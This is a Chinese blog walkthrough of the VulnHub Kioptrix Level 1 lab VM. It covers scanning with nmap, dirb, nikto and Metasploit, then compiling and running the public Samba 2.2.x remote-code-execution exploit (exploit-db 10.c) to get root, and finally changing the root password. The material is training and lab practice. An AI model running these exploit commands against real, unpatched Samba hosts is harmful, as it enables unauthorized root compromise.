zoukankan      html  css  js  c++  java
  • PJzhang:vulnhub靶机Kioptrix系列KIOPTRIX:LEVEL 1

    猫宁~~~

    地址:https://www.vulnhub.com/entry/kioptrix-level-1-1,22/

    重点关注工具使用和测试思路。

    kali linux攻击机   192.168.100.4

    nmap 192.168.100.0/24

    确认靶机的IP

    Kioptrix-1.0靶机   192.168.100.5

    nmap -sV -p1-65535 192.168.100.5

    全端口扫描

    结果如下,开放22,80,139,443,系统是centos

    22   ssh   

    OpenSSH 2.9p2 (protocol 1.99)

    80   http   

    Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)

    111/tcp  open  rpcbind     

    2 (RPC #100000)

    139/tcp  open  netbios-ssn 

    Samba smbd (workgroup: MYGROUP)

    443/tcp  open  ssl/https   

    Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b

    1024/tcp open  status      

    1 (RPC #100024)

    dirb 192.168.100.5

    扫描目录

    nikto -h 192.168.100.5

    扫描linux相关指纹与漏洞

    重点关注一下开放139端口的Samba smbd服务。

    msfconsole

    search smb

    use auxiliary/scanner/smb/smb_version

    show options

    set rhost 192.168.100.5

    run

    Host could not be identified: Unix (Samba 2.2.1a)

    searchsploit samba

    Samba < 2.2.8 (Linux/BSD) - Remote Code Execution

    /usr/share/exploitdb/exploits/multiple/remote/10.c

    cp /usr/share/exploitdb/exploits/multiple/remote/10.c /root/10.c 

    尝试一下。

    payload地址:https://www.exploit-db.com/exploits/10

    gcc 10.c -o muma

    ./muma -d 0 -C 60 -S 192.168.100

    扫描1个C段。

    ./muma -b 0 -v 192.168.100.5

    直接获取root权限。

    uid=0(root) gid=0(root) groups=99(nobody)

    python -v

    显示python版本是1.5的

    python -c 'import pty; pty.spawn("/bin/bash")'

    无法运行

    passwd命令修改密码为123456

    经虚拟机登录上去。

  • 相关阅读:
    【redis】主从复制
    【redis】订阅功能
    【redis】基础
    MySQL【十二】pymysql操作数据库
    MySQL【十一】创建索引
    MySQL【十】认识索引
    MySQL【九】树
    MySQL【八】多表查询
    ubuntu 制作ISO模块
    ubuntu 开机自启动
  • 原文地址:https://www.cnblogs.com/landesk/p/13630046.html
Copyright © 2011-2022 走看看